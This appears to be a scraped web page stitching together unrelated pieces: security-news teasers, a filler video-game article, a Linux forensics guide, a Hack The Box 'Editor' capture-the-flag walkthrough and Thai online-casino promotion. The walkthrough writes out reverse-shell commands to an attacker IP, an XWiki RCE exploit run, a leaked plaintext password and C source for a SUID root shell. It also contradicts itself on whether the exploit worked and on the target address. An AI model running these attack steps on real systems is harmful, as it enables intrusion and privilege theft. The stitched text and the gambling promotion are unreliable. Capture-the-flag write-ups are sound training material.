A massive Indonesian-speaking cybercrime operation spanning over 14 years has been uncovered, revealing a sophisticated infrastructure that shows hallmarks of state-level backing and resources typically associated with advanced persistent threat actors. Security researchers at Malanta have exposed what may be one of the largest and most complex Indonesian-speaking cyber operations ever documented a sprawling ecosystem […]
The post Indonesia’s Gambling Industry Reveals Clues of Nationwide Cyber Involvement appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Cal.com has disclosed a critical authentication bypass vulnerability that could allow attackers to gain unauthorized access to user accounts by exploiting a flaw in password verification logic. The flaw, tracked as CVE-2025-66489 and assigned a critical CVSS v4 score of 9.3, affects all versions of Cal.com up to and including 5.9.7. Users are urged to […]
The post Critical Cal.com Flaw Allows Attackers to Bypass Authentication Using Fake TOTP Codes appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
A sophisticated new “packer-as-a-service” tool known as Shanya has emerged in the cybercriminal underground, rapidly becoming a preferred weapon for major ransomware groups looking to neutralize endpoint defenses. According to new research from Sophos, Shanya is an evolution in the “EDR killer” market, effectively succeeding previous tools like HeartCrypt. The malware is designed to blind […]
The post Shanya EDR Killer: The New Favorite Tool for Ransomware Operators appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
A critical remote code execution vulnerability in React Server Components has emerged as an active exploitation target, with security researchers observing widespread automated attacks across the internet. The flaw, tracked as CVE-2025-55182 and dubbed “React2Shell,” affects React and downstream ecosystems, including the popular Next.js framework, prompting urgent calls for immediate patching. CVE ID Vulnerability CVSS Score Severity […]
The post Critical React2Shell RCE Flaw Actively Exploited to Run Malicious Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
A groundbreaking security research project has uncovered a new class of vulnerabilities affecting virtually every major AI-powered integrated development environment (IDE) and coding assistant on the market. Dubbed “IDEsaster,” this attack chain exploits fundamental features of underlying IDE platforms to exfiltrate data and execute remote code, impacting millions of developers worldwide. The research, conducted over […]
The post Critical Vulnerabilities Found in GitHub Copilot, Gemini CLI, Claude, and Other AI Tools Affect Millions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Security researchers have uncovered critical infrastructure details for the notorious LockBit 5.0 ransomware operation, including the IP address 205.185.116.233 and the domain karma0.xyz, which hosts the group’s latest leak site. The discovery represents a significant operational security failure for the cybercriminal organization. Cybersecurity researcher Rakesh Krishnan first publicized the findings on December 5, 2025, identifying […]
The post LockBit 5.0 Infrastructure Exposed as Hackers Leak Critical Server Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Wheon Grand Theft Auto is one of the most prominent and thus widely discussed titles in the video game community, and the timeline released to date is packed with exhilarating action, enthralling missions, and an impressive set of environments that are packed with detail. It has successfully captivated audiences' attention, ranging from those who are newcomers to the industry to those who are long-time veterans of the Grand Theft Auto series. It is with the most recent upgrades to the game that we have seen polished and immersive gameplay that captures attention to the series at an entirely new level. This guide will detail features and modifications that distinctly set the upgrades to Wheon Grand Theft Auto apart from other releases.
Arguably, one of the most impressive aspects of Wheon Grand Theft Auto is the most recent updates to the settings of the open world. This series of upgrades resulted in a more realistic world with an intricate and lifelike response to the player's actions.
The world features a wide range of environments, including, but not limited to, streets, forests, beaches, and industrial areas. Each of these environments has its own unique level of detail that brings a new level of engagement to the world.
The world is more impressive from a variety of different aspects. People's actions are more coordinated and realistic, a more complex system has been implemented to the flow of traffic, and at a higher level of detail has been applied to the weather patterns and lighting. All of these unique and intricate features have resulted in a world that is impressive and deeply immersive.
With the new update, there have been improvements to the graphical quality of the game. The character models are more well-defined, shadows are rendered with depth, and the reflections, particularly on cars and buildings, are more realistic. The game also maintains a good frame rate and consistent performance across a wider range of devices, even with the increased activity in a given scene.
In addition, many players appreciate the frame rate improvements, in addition to shorter loading screens, and the overall quality of the textures. The visual improvements add a more cinematic quality to the game, making even tasks of little consequence more enjoyable.
Grand Theft Auto more than doubled the amount of story-related missions available to players. For new players, this upgrade provides a strong foundational basis to the story world. For returning players, it provides more complexity to the story. Additionally, players with new expressive animations, more richly designed dialogue, and unpredictable plot developments were added to pre-existing missions throughout the game.
Some missions have incorporated a more branched structure, creating avenues of in-game decision-making. This empowers players to customize and more freely choose the objectives and completion style—whether through stealth, speed, fire, or solving a series of interrelated tasks. As a more developed story world was added, the missions were also upgraded.
Upgraded vehicles and customization options have been an important part of the gameplay ever since the GTA franchise added vehicles. This new edition features an impressive collection of new vehicles, including:
• New Military Vehicles
• Fast Sports Cars
• Heavy Duty Trucks
• Detailed Motorcycles
• Custom Built Street Racers
All vehicles are fully customizable. Players can change the suspension, engines, and even the interiors. These options make it so players can have a customized vehicle that they enjoy riding.
The driving experience has certainly been improved. New features make driving fun and responsive. Players can enjoy the new systems by either racing or cruising.
Major enhancements have also gone into combat and enemy AI. New weapons have been added, as well as improved shooting and better animations.
Computer opponents are much more advanced and make good decisions, such as taking cover or communicating with other opponents on the map.
The difficulty of missions has also been increased, and they have become much more engaging and fun.
The expansion of every multiplayer option encourages participation in numerous timed events, missions, challenges, and open-world activities with friends and, as of the recent update, allows for far more organized and profitable planning of multiplayer heists.
The update allows for far more, especially optimized voice chat, and every player in the match can expect easier customization of their characters for online play. Together, these features give everyone more opportunities for interactivity within the community.
The recent soundtrack update adds several more stimulating songs for radio stations during important vehicle missions, further increasing the level of ambient noise and making an already stimulating game even more entertaining.
The update adds a greater variety of background ambient noise, vehicle ache noises, and chunks of explosions with gunfire, every update even optimizing the stations within the game.
The recent expansion adds entirely new zones of interest on the map, stimulating unique new immersive gameplay and exploration in the game. Players can discover many new remote villages, and coastal roads, along with countless number of treasure Easter eggs and concealed challenges.
The developers of the game planned for players to want to discover every new feature in the game, new portions of the landscape, encouraging players to use their imagination and creativity, and exploration in the open world sandbox game.
The dedication to iterative improvement of the game helps keep it fresh. The devs regularly address issues, implement new features, optimize performance, and add new events. Players always have something new to experience.
Also Read: https://www.hackersking.in/2025/09/locate-your-lost-device-using-google-find-hub.html
With every update, Wheon Grand Theft Auto continues to thrive with new, richer play, great graphics, refined combat, and an enriched world acquisition. This title provides a consummate experience whether you are an experienced player or are encountering the series' creativity for the first time.
Thanks for choosing HackersKing for detailed guides, the latest technology news, and frequent updates regarding the gaming world.
A hidden danger has been lurking in the Go programming ecosystem for over four years. Security researchers from the Socket Threat Research Team have discovered two malicious software packages that impersonate popular Google tools. These fake packages, designed to trick busy developers, have been quietly stealing data since May 2021. The malicious packages are identified […]
The post Malicious Go Packages Impersonate Google’s UUID Library to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Barts Health NHS Trust has disclosed a significant data breach affecting patient and staff information after the Cl0p ransomware gang exploited a critical vulnerability in Oracle E-Business Suite software. The criminal syndicate stole files from an invoice database. It published them on the dark web, compromising the personal data of individuals who received treatment or […]
The post Barts Health NHS Reveals Data Breach Linked to Oracle Zero-Day Exploited by Clop Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Welcome back, aspiring forensic investigators.
Linux is everywhere today. It runs web servers, powers many smartphones, and can even be found inside the infotainment systems of cars. A few reasons for its wide use are that Linux is open source, available in many different distributions, and can be tailored to run on both powerful servers and tiny embedded devices. It is lightweight, modular, and allows administrators to install only the pieces they need. Those qualities make Linux a core part of many organizations and of our daily digital lives. Attackers favour Linux as well. Besides being a common platform for their tools, many Linux hosts suffer from weak monitoring. Compromised machines are frequently used for reverse proxies, persistence, reconnaissance and other tasks, which increases the need for forensic attention. Linux itself is not inherently complex, but it can hide activity in many small places. In later articles we will dive deeper into what you can find on a Linux host during an investigation. Our goal across the series is to build a compact, reliable cheat sheet you can return to while handling an incident. The same approach applies to Windows investigations as well.
Today we will cover the basics of Linux forensics. For many incidents this level of detail will be enough to begin an investigation and perform initial response actions. Let’s start.
The first thing to check is the distribution and release information. Different Linux distributions use different defaults, package managers and filesystem layouts. Knowing which one you are examining helps you predict where evidence or configuration will live.
bash> cat /etc/os-release
Common distributions and their typical uses include Debian and Ubuntu, which are widely used on servers and desktops. They are stable and well documented. RHEL and CentOS are mainly in enterprise environments with long-term support. Fedora offers cutting-edge features, Arch is rolling releases for experienced users, Alpine is very small and popular in containers. Security builds such as Kali or Parrot have pentesting toolsets. Kali contains many offensive tools that hackers use and is also useful for incident response in some cases.
Record the system’s hostname early and keep a running list of hostnames you encounter. Hostnames help you map an asset to network records, correlate logs across systems, identify which machine was involved in an event, and reduce ambiguity when combining evidence from several sources.
bash> cat /etc/hostname
bash> hostname
Timezone information gives a useful hint about the likely operating hours of the device and can help align timestamps with other systems. You can read the configured timezone with:
bash> cat /etc/timezone
User accounts are central to persistence and lateral movement. Local accounts are recorded in /etc/passwd (account metadata and login shell) and /etc/shadow (hashed passwords and aging information). A malicious actor who wants persistent access may add an account or modify these files. To inspect the user list in a readable form, use:
bash> cat /etc/passwd | column -t -s :
You can also list users who are allowed interactive shells by filtering the shell field:
bash> cat /etc/passwd | grep -i 'ash'
Groups control access to shared resources. Group membership can reveal privilege escalation or lateral access. Group definitions are stored in /etc/group. View them with:
bash> cat /etc/group
Users who can use sudo can escalate privileges. The main configuration file is /etc/sudoers, but configuration snippets may also exist under /etc/sudoers.d. Review both locations:
bash> ls -l /etc/sudoers.d/
bash> sudo cat /etc/sudoers
The /var/log directory holds login-related records. Two important binary files are wtmp and btmp. The first one records successful logins and logouts over time, while btmp records failed login attempts. These are binary files and must be inspected with tools such as last (for wtmp) and lastb (for btmp), for example:
bash> sudo last -f /var/log/wtmp
bash> sudo lastb -f /var/log/btmp
Network interface configuration can be stored in different places depending on the distribution and the network manager in use. On Debian-based systems you may see /etc/network/interfaces. For a quick look at configured interfaces, examine:
bash> cat /etc/network/interfaces
bash> ip a show
On a live system, active connections reveal current communications and can suggest where an attacker is connecting to or from. Traditional tools include netstat:
bash> netstat -natp
A modern alternative is ss -tulnp, which provides similar details and is usually available on newer systems.
Enumerating processes shows what is currently executing on the host and helps spot unexpected or malicious processes. Use ps for a snapshot or interactive tools for live inspection:
bash> ps aux
If available, top or htop give interactive views of CPU/memory and process trees.
DNS configuration is important because attackers sometimes alter name resolution to intercept or redirect traffic. Simple local overrides live in /etc/hosts. DNS server configuration is usually in /etc/resolv.conf. Often attackers might perform DNS poisoning or tampering to redirect victims to malicious services. Check the relevant files:
bash> cat /etc/hosts
bash> cat /etc/resolv.conf
There are many common persistence techniques on Linux. Examine scheduled tasks, services, user startup files and systemd units carefully.
Cron is often used for legitimate scheduled tasks, but attackers commonly use it for persistence because it’s simple and reliable. System-wide cron entries live in /etc/crontab, and individual service-style cron jobs can be placed under /etc/cron.d/. User crontabs are stored under /var/spool/cron/crontabs on many distributions. Listing system cron entries might look like:
bash> cat /etc/crontab
bash> ls /etc/cron.d/
bash> ls /var/spool/cron/crontabs
Many malicious actors prefer cron because it does not require deep system knowledge. A simple entry that runs a script periodically is often enough.
Services or daemons start automatically and run in the background. Modern distributions use systemd units which are typically found under /etc/systemd/system or /lib/systemd/system, while older SysV-style scripts live in /etc/init.d/. A quick check of service scripts and unit files can reveal backdoors or unexpected startup items:
bash> ls /etc/init.d/
bash> systemctl list-unit-files --type=service
bash> ls /etc/systemd/system
Per-user shell startup files such as ~/.bashrc, ~/.profile, or ~/.bash_profile can be modified to execute commands when an interactive shell starts. Attackers sometimes add small one-liners that re-establish connections or drop a backdoor when a user logs in. The downside for attackers is that these files only execute for interactive shells. Services and non-interactive processes will not source them, so they are not a universal persistence method. Still, review each user’s shell startup files:
bash> cat ~/.bashrc
bash> cat ~/.profile
Linux can offer attackers a lot of stealth, as logging can be disabled, rotated, or manipulated. When the system’s logging is intact, many useful artifacts remain. When it is not, you must rely on other sources such as filesystem timestamps, process state, and memory captures.
Most shells record commands to a history file such as ~/.bash_history. This file can show what commands were used interactively by a user, but it is not a guaranteed record, as users or attackers can clear it, change HISTFILE, or disable history entirely. Collect each user’s history (including root) where available:
bash> cat ~/.bash_history
Tmux and other terminal multiplexers themselves normally don’t provide a persistent command log. Commands executed in a tmux session run in normal shell processes. Whether those commands are saved depends on the tmux configurations.
When a user runs commands with sudo, those events are typically logged in the authentication logs. You can grep for recorded COMMAND entries to see what privileged commands were executed:
bash> cat /var/log/auth.log* | grep -i COMMAND | less
The Vim editor stores some local history and marks in a file named .viminfo in the user’s home directory. That file can include command-line history, search patterns and other useful traces of editing activity:
bash> cat ~/.viminfo
If the system logging service (for example, rsyslog or journald) is enabled and not tampered with, the files under /var/log are often the richest source of chronological evidence. The system log (syslog) records messages from many subsystems and services. Because syslog can become large, systems rotate older logs into files such as syslog.1, syslog.2.gz, and so on. Use shell wildcards and standard text tools to search through rotated logs efficiently:
bash> cat /var/log/syslog* | head
When reading syslog entries you will typically see a timestamp, the host name, the process producing the entry and a message. Look for unusual service failures, unexpected cron jobs running, or log entries from unknown processes.
Authentication activity, such as successful and failed logins, sudo attempts, SSH connections and PAM events are usually recorded in an authentication log such as /var/log/auth.log. Because these files can be large, use tools like grep, tail and less to focus on the relevant lines. For example, to find successful logins you run this:
bash> cat /var/log/auth.log | grep -ai accepted
Many services keep their own logs under /var/log. Web servers, file-sharing services, mail daemons and other third-party software will have dedicated directories there. For example, Apache and Samba typically create subdirectories where you can inspect access and error logs:
bash> ls /var/log
bash> ls /var/log/apache2/
bash> ls /var/log/samba/
A steady, methodical sweep of the locations described above will give you a strong start in most Linux investigations. You start by verifying the OS, recording host metadata, enumerating users and groups, then you move to examining scheduled tasks and services, collecting relevant logs and history files. Always preserve evidence carefully and collect copies of volatile data when possible. In future articles we will expand on file system forensics, memory analysis and tools that make formal evidence collection and analysis easier.
In this write-up, we will explore the “Editor” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the “Editor” machine from Hack The Box by achieving the following objectives:
Initial enumeration identifies an XWiki service on port 8080. The footer reveals the exact version, which is vulnerable to an unauthenticated Solr RCE (CVE-2025-24893). Running a public proof of concept provides a reverse shell as the xwiki service account. Exploring the installation directory reveals the hibernate.cfg.xml file, where plaintext database credentials are stored. These credentials are valid for the local user oliver as well. Using them for SSH access grants a stable shell as oliver, which makes it possible to read the user flag.
Several plugin files are owned by root, set as SUID, and still group-writable. Since oliver belongs to the netdata group, these files can be modified directly. Additionally, this access allows a small SUID helper to be compiled and uploaded, which is then used to overwrite the ndsudo plugin. Afterwards, Netdata executes this plugin with root privileges during normal operation, and therefore, the replacement immediately forces the service to run the injected payload.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Loginnmap -sV -sC -oA initial 10.10.11.80Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/editor]
└──╼ $nmap -sV -sC -oA initial 10.10.11.80
# Nmap 7.94SVN scan initiated Wed Dec 3 23:11:12 2025 as: nmap -sV -sC -oA initial 10.10.11.80
Nmap scan report for 10.10.11.80
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan:
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Server Type: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAnalysis:
XWiki is a free, open-source enterprise wiki platform written in Java. Think of it as a super-powered Wikipedia-style software that companies or teams install on their own servers to create internal knowledge bases, documentation sites, collaborative portals, etc.
Web Application Exploration:
Perform web enumeration to discover potentially exploitable directories and files.
Landing on http://editor.htb, we’re greeted by the homepage of “SimplistCode Pro” – a sleek, modern web-based code editor that looks almost identical to VS Code, complete with Ace Editor, file tree, and integrated terminal.
Accessing http://10.10.11.180:8080/xwiki/bin/view/Main/ reveals the built-in XWiki documentation page for SimplistCode Pro – confirming the actual editor runs on an XWiki instance at port 8080.
After discovering that the web service on port 8080 is an XWiki instance and confirming the exact version 15.10.8 from the footer banner, we immediately searched for public exploits.
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform, an open-source enterprise wiki software. It allows any guest user (no login required) to execute arbitrary Groovy code on the server by sending a specially crafted request to the SolrSearch macro. This flaw stems from improper sandboxing and sanitisation of Groovy expressions in asynchronous macro rendering, enabling attackers to inject and execute malicious code via search parameters
This version is vulnerable to CVE-2025-24893 – an unauthenticated Remote Code Execution in the Solr search component via malicious Groovy templates.
We clone the public PoC from gunzf0x’s GitHub repository: git clone https://github.com/gunzf0x/CVE-2025-24893
Testing the exploit syntax first – the script help shows mandatory flags -t (target URL) and -c (command).
Setting up our listener with nc -lvnp 9007 to catch the reverse shell.
We launch the final exploit python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘bash -c “bash -i >/dev/tcp/10.10.14.189/9007 0>&1″‘ -e /bin/bash
Unfortunately, the CVE-2025-24893 exploit failed to pop a shell — no connection back to our listener—time to pivot and hunt for another path.
The exploit worked perfectly! Final command that popped the shell: python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘busybox nc 10.10.14.189 9007 -e /bin/bash’ The script injected Groovy code via the vulnerable Solr search endpoint, executed busybox nc … -e /bin/bash, and gave us our reverse shell as the xwiki system user.
Back on our attacker box, we fire up nc -lvnp 9007. Moments later, the listener catches a connection from 10.10.11.80:59508. Running id confirms we successfully landed as xwiki (uid=997) – the exact user running the XWiki Jetty instance. Initial foothold achieved!
The shell is raw and non-interactive. We immediately stabilize it: which python3 → /usr/bin/python3 python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ Prompt changes to xwiki@editor:/usr/lib/xwiki-jetty$ – full TTY achieved, background color and everything.
Inside the limited shell as xwiki@editor, we see another user home directory called oliver. Attempting cd oliver instantly fails with Permission denied – no direct access yet, but we now know the real target user is oliver.
Quick enumeration with find / -name “xwiki” 2>/dev/null reveals all XWiki-related paths (config, data store, logs, webapps, etc.). Confirms we’re deep inside the actual XWiki installation running under Jetty.
ls in the same directory reveals the classic XWiki/Jetty config files, including the juicy hibernate.cfg.xml – this file almost always contains plaintext database credentials.
Full cat hibernate.cfg.xml confirms this is the real DB password used by the application. Classic misconfiguration: developers reuse the same password for the DB user and the system user oliver.
cat hibernate.cfg.xml | grep password instantly dumps multiple entries, and the first one is: theEd1t0rTeam99 Bingo – plaintext password for the XWiki database (and very often reused elsewhere).
While poking around /usr/lib/xwiki/WEB-INF/, we try su oliver and blindly guess the password theEd1t0rTeam99 (common pattern on HTB). It fails with an Authentication failure – wrong password, but we now know the exact target user is Oliver.
Attempting to SSH directly as xwiki@editor.htb results in “Permission denied, please try again.” (twice). Attackers cannot log in via password-based SSH because the xwiki system account lacks a valid password (a common setup for service accounts). We can only interact with the XWiki user via the reverse shell we already have from the CVE exploit. No direct SSH access here.
From our attacker box we can now SSH directly as oliver (optional, cleaner shell): ssh oliver@editor.htb → password theEd1t0rTeam99 → clean login
User flag successfully grabbed! We’re officially the oliver user and one step closer to root.
Privilege Escalation:
Sorry, user oliver may not run sudo on editor. No passwordless sudo, no obvious entry in /etc/sudoers.
Only oliver’s normal processes visible: systemd user instance and our own bash/ps. No weird cronjobs, no suspicious parent processes. Confirms we need a deeper, non-obvious privesc vector.
After stabilising our shell as oliver, we immediately start hunting for privilege-escalation vectors. First, we run find / -perm 4000 2>/dev/null to enumerate SUID binaries – the output returns nothing interesting, instantly ruling out the classic GTFOBins path. To be thorough, we double-check find / -user root -perm 4000 2>/dev/null in case any root-owned SUIDs were missed, but the result is the same: no promising binaries. Straight-up SUID exploitation is off the table, so we pivot to deeper enumeration with LinPEAS and other techniques. Root will require a less obvious vector.
Downloading LinPEAS into /dev/shm (tempfs, stays hidden and writable).
As oliver, we fire up LinPEAS in /dev/shm: ./linpeas.sh. The legendary green ASCII art confirms it’s running and scanning.
LinPEAS lights up the intended privesc path in bright red: a whole directory of Netdata plugins under /opt/netdata/usr/libexec/netdata/plugins.d/ are owned by root, belong to the netdata group, have the SUID bit set, and are writable by the group. Since groups oliver shows we’re in the netdata group, we can overwrite any of these binaries with our own malicious payload and instantly get a root shell the next time Netdata executes the plugin (which happens automatically every few seconds). Classic Netdata SUID misconfiguration, game over for root.
The key section “Files with Interesting Permissions” + “SUID – Check easy privesc” shows multiple Netdata plugins (like go.d.plugin, ndsudo, network-viewer.plugin, etc.) owned by root but executable/writable by the netdata group or others. Classic Netdata misconfiguration on HTB boxes.
dark.c – our tiny SUID root shell source code:
#include <unistd.h>
int main() {
setuid(0); setgid(0);
execle("/bin/bash", "bash", NULL);
return 0;
}Compiled locally with gcc dark.c -o nvme, this will be uploaded and used to overwrite one of the writable Netdata SUID plugins.
We compile our SUID shell as nvme to specifically target the Netdata plugin ndsudo at /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo. This file is root-owned, SUID, belongs to the netdata group, and is group-writable. Since oliver is in the netdata group, we can overwrite it directly. Netdata periodically runs ndsudo as root, so replacing it with our payload triggers an instant root shell. The name nvme is short, harmless-looking, and doesn’t clash with real system binaries, making it the perfect stealthy replacement. Upload → overwrite ndsudo → wait a few seconds → root. Simple and deadly effective
curl our compiled nvme from the attacker machine → download complete
chmod +x nvme → make it executable. Temporarily prepend /dev/shm to PATH so we can test it locally
When testing our malicious nvme binary with the existing ndsudo plugin (/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list), it fails with “nvme : not available in PATH.” This is expected because we haven’t overwritten ndsudo yet—it’s still the original binary, and our nvme isn’t in the PATH for this test command. It’s a quick sanity check to confirm the setup before the real overwrite. Next, we’ll copy nvme directly over ndsudo to hijack it.
An ls in /dev/shm now shows nvme is missing — we already moved or deleted it during testing. No problem: we just re-download it with curl nvme, chmod +x nvme, and we’re back in business, ready for the final overwrite of ndsudo. Payload restored, stealth intact.
We re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-listWe re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Root flag captured! With the Netdata plugin overwritten and triggered, we’ve spawned our SUID shell as root. Machine fully owned.
The post Hack The Box: Editor Machine Walkthrugh – Easy Difficulity appeared first on Threatninja.net.
สิ่งที่คนตามหาเวลาพิมพ์ว่า คาสิโนยอดฮิต คือความรู้สึก “เลือกแล้วไม่พลาด” ทั้งเรื่องเกมที่สนุกจริง เว็บที่ลื่นจริง และโปรที่คุ้มจริง ไม่ใช่แค่ชื่อเกมดังแล้วต้องไปหัวร้อนกับสตรีมค้าง ถอนช้า หรือเจอเงื่อนไขจุกจิกทีหลัง หลายคนเริ่มจากการไล่ดูว่าอะไรคือ คาสิโนออนไลน์ยอดฮิต แล้วค่อยดึงตัวที่ถูกใจไปลอง แต่ถ้าอยากประหยัดเวลา ให้มองภาพกว้างก่อนว่าเราชอบแนวไหน—สายสดที่ลุ้นทุกตา สายสล็อตที่เล่นเพลิน หรือสายเกมโต๊ะที่วางแผนได้ เพราะ “เลือกแนวให้ตรงนิสัย” สำคัญพอ ๆ กับ “เลือกเว็บให้มั่นใจ”
อีกคำที่คนชอบค้นพ่วงกันคือ เกมคาสิโนยอดฮิต เพราะมันไม่ใช่แค่บาคาร่าอย่างเดียว เดี๋ยวนี้มีทั้งรูเล็ต เสือมังกร แบล็คแจ็ค ไปจนถึงสล็อตที่ภาพสวยและฟีลลื่น ๆ แถมปีนี้ยังมีพวก คาสิโนมาแรง ที่คนกระโดดเข้าไปลองเพราะระบบรองรับมือถือดีขึ้น เกมโหลดไวขึ้น และมีโปรให้เล่นต่อได้ยาว ๆ แต่สิ่งที่แยกคนเล่นเป็นออกจากคนเล่นตามกระแสคือ “เช็คเงื่อนไขให้จบก่อนกดจริง” โดยเฉพาะคำถามแนวใช้งานจริงอย่าง คาสิโนยอดฮิต เว็บไหนดี 2025 เพราะสุดท้ายเว็บที่ดีต้องตอบได้ทั้งความเสถียร ความปลอดภัย และการถอน
แล้วอย่ามองข้ามเรื่องระบบนะ เว็บที่ทำงานดีจริงมักจะมี ระบบเสถียร ไม่ล่ม และมีทีมดูแลแบบ ซัพพอร์ต 24 ชั่วโมง ที่ตอบเป็นเรื่องเป็นราว ไม่ใช่ตอบแบบกั๊ก ๆ เพราะเวลามีปัญหาจริงคุณต้องการคำตอบที่ช่วยแก้ได้ทันที นอกจากนี้การเลือกเว็บแนว เว็บตรงไม่ผ่านเอเย่นต์ ก็มีข้อดีตรงที่เส้นทางบริการมักสั้นกว่า ทำให้การฝากถอนและการตามเรื่องง่ายกว่า ไม่ต้องถูกโยนไปหลายชั้นจนเสียเวลา
บทความนี้เลยจะพาคุณดู 4 มุมที่คนเล่นชอบที่สุด ตั้งแต่เกมสดที่ลุ้นสุดมือ ไปจนถึงการดูเว็บให้ชัวร์ ระบบถอนให้จบไว และทริคเลือกเกมให้เหมาะกับตัวเองแบบไม่ฝืน เพราะเป้าหมายไม่ใช่แค่ “เล่นได้” แต่คือ “เล่นแล้วรู้สึกคุมเกมอยู่จริง”
ถ้าคุณเป็นคนชอบบรรยากาศเหมือนนั่งหน้าโต๊ะจริง เกม คาสิโนสด คือโซนที่ทำให้หัวใจเต้นสุด โดยเฉพาะตอนเจอดีลเลอร์แจกไพ่แล้วทั้งโต๊ะลุ้นพร้อมกัน จุดขายของเกมสดไม่ได้อยู่ที่ “เล่นได้” แต่อยู่ที่ “ฟีลมันถึง” เช่น ภาพคม เสียงชัด และเกมไม่ดีเลย์ เพราะแค่กระตุกนิดเดียวอารมณ์ก็หลุดแล้ว ดังนั้นถ้าจะเลือกเกมสดให้สนุกจริง ให้เริ่มจากเลือกเกมที่สปีดเข้ากับนิสัยเรา ไม่ใช่เห็นคนเล่นเยอะแล้วฝืนตาม
เกมที่คนส่วนใหญ่เริ่มก่อนมักเป็น บาคาร่าออนไลน์ เพราะกติกาไม่ซับซ้อน จังหวะเกมค่อนข้างคงที่ และคุณวางสไตล์เดิมพันของตัวเองได้ชัด บางคนสายชอบเกมเร็วก็จะไปทาง ไพ่เสือมังกร ที่ลุ้นไว จบไว เหมาะกับคนที่อยากได้ความเร้าใจแบบไม่ต้องคิดเยอะ แต่ถ้าคุณชอบความรู้สึก “อ่านเกม” และโยนความเสี่ยงให้เป็นระบบมากขึ้น เกมอย่าง รูเล็ตออนไลน์ ก็สนุกคนละแบบ เพราะมันทำให้คุณคุมจำนวนไม้ คุมพื้นที่ความเสี่ยง และเล่นแบบมีแผนได้มากกว่าเดิม ส่วนสายที่ชอบกติกาใส ๆ ไม่ต้องมีสถิติอะไรให้ปวดหัว ก็มี แบล็คแจ็ค ที่ทำให้การตัดสินใจของคุณมีผลจริง เหมือนเล่นเกมที่ใช้สมองมากกว่าอารมณ์
แต่ความสนุกของเกมสดจะไปได้ไกลสุดเมื่อคุณ “คุมจังหวะ” ให้เป็น ไม่ใช่พอแพ้แล้วเร่งเอาคืนแบบหัวร้อน วิธีคิดที่เวิร์กคือให้คุณกำหนดก่อนว่าเล่นกี่รอบ แล้วหยุดเมื่อถึงจุดนั้น ไม่ว่าผลจะเป็นยังไง เพราะเกมสดมันทำให้เราหลงจังหวะได้ง่ายมาก อีกเรื่องที่คนมักพลาดคือเลือกโต๊ะที่สปีดไม่เข้ากับตัวเอง บางโต๊ะเร็วมากจนคุณกดตามไม่ทัน บางโต๊ะช้าจนคุณเริ่มเบื่อแล้วเผลอเพิ่มเงินแบบไม่มีเหตุผล
ถ้าจะให้เล่นสนุกแบบไม่หลุด ให้มองภาพรวมของโต๊ะมากกว่าหน้าตาเกม เช่น เสถียรภาพของสตรีม การเปลี่ยนห้องได้ไว และความลื่นตอนสลับหน้าจอบนมือถือ เพราะสิ่งเหล่านี้คือ “ของจริง” ที่ทำให้คุณเล่นต่อได้ยาว ไม่ใช่แค่ชนะตาเดียวแล้วจบ วันไหนอยากมันส์ก็ลงเกมเร็ว วันไหนอยากนิ่งก็ลงเกมโต๊ะที่ใช้จังหวะคิด แค่เลือกให้เข้ามือ คุณจะรู้สึกว่าเกมสดไม่ใช่เรื่องเสี่ยงล้วน ๆ แต่มันคือความสนุกที่เราคุมได้ด้วยวินัยของตัวเอง
